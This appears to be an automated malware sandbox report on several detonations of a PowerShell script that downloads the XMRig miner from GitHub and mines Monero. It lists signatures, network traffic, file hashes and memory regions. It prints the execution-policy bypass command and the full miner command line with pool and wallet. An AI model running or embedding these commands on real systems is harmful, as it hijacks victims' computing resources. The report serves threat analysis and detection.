powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/3896-0-0x00007FFA19893000-0x00007FFA19895000-memory.dmp

memory/3896-6-0x000001ED53630000-0x000001ED53652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ur1cono4.3ts.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3896-11-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/3896-12-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/3896-14-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/3896-15-0x000001ED54390000-0x000001ED543A2000-memory.dmp

memory/3896-16-0x000001ED53660000-0x000001ED5366A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4236-47-0x0000023B76420000-0x0000023B76440000-memory.dmp

memory/4236-48-0x0000023B77E30000-0x0000023B77E50000-memory.dmp

memory/4236-49-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-52-0x0000023B77E70000-0x0000023B77E90000-memory.dmp

memory/4236-51-0x0000023B77E50000-0x0000023B77E70000-memory.dmp

memory/4236-50-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/3896-53-0x00007FFA19893000-0x00007FFA19895000-memory.dmp

memory/3896-54-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/4236-55-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-56-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-57-0x0000023B77E50000-0x0000023B77E70000-memory.dmp

memory/4236-58-0x0000023B77E70000-0x0000023B77E90000-memory.dmp

memory/4236-59-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-60-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-61-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-62-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-63-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-64-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-65-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-66-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-67-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-68-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-69-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-70-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-71-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-72-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-73-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-74-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-75-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-76-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-77-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-78-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-79-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-80-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-81-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-82-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-83-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-84-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-85-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-86-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-87-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-88-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-89-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-90-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-91-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-92-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-93-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-94-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-95-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-96-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-97-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-98-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-99-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-100-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-101-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-102-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-103-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-104-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-105-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-106-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-107-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-108-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-109-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-110-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-111-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-112-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-113-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-114-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-115-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-116-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

memory/4236-117-0x00007FF749F00000-0x00007FF74AB33000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:07

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/3620-4-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-3-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-6-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-7-0x000002633B420000-0x000002633B442000-memory.dmp

memory/3620-10-0x000002633B610000-0x000002633B686000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42jds1w5.3we.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3620-25-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3620-48-0x000002633B5F0000-0x000002633B602000-memory.dmp

memory/3620-61-0x000002633B470000-0x000002633B47A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3020-90-0x000001FB1D920000-0x000001FB1D940000-memory.dmp

memory/3020-91-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3620-93-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3020-92-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3620-94-0x00007FF87E8A0000-0x00007FF87EA7B000-memory.dmp

memory/3020-95-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-96-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-97-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-98-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-99-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-100-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-101-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-102-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-103-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-104-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-105-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-106-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-107-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-108-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-109-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-110-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-111-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-112-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-113-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-114-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-115-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-116-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-117-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-118-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-119-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-120-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-121-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-122-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-123-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-124-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-125-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-126-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-127-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-128-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-129-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-130-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-131-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-132-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-133-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-134-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-135-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-136-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-137-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-138-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-139-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-140-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-141-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-142-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-143-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-144-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-145-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-146-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-147-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-148-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-149-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-150-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-151-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-152-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-153-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-154-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

memory/3020-155-0x00007FF723E20000-0x00007FF724A53000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win11-20240508-en

Max time kernel

1790s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4088-0-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_esyjkhjw.g5s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4088-9-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/4088-10-0x00000280F0BA0000-0x00000280F0BC2000-memory.dmp

memory/4088-11-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/4088-12-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/4088-14-0x00000280F0D80000-0x00000280F0D92000-memory.dmp

memory/4088-15-0x00000280F0D60000-0x00000280F0D6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1028-46-0x000001CC3AEA0000-0x000001CC3AEC0000-memory.dmp

memory/1028-47-0x000001CC3C610000-0x000001CC3C630000-memory.dmp

memory/1028-48-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/4088-49-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/1028-52-0x000001CC3C630000-0x000001CC3C650000-memory.dmp

memory/4088-51-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp

memory/1028-50-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-54-0x000001CC3C650000-0x000001CC3C670000-memory.dmp

memory/4088-53-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/1028-55-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-57-0x000001CC3C630000-0x000001CC3C650000-memory.dmp

memory/1028-56-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-58-0x000001CC3C650000-0x000001CC3C670000-memory.dmp

memory/1028-59-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-60-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-61-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-62-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-63-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-64-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

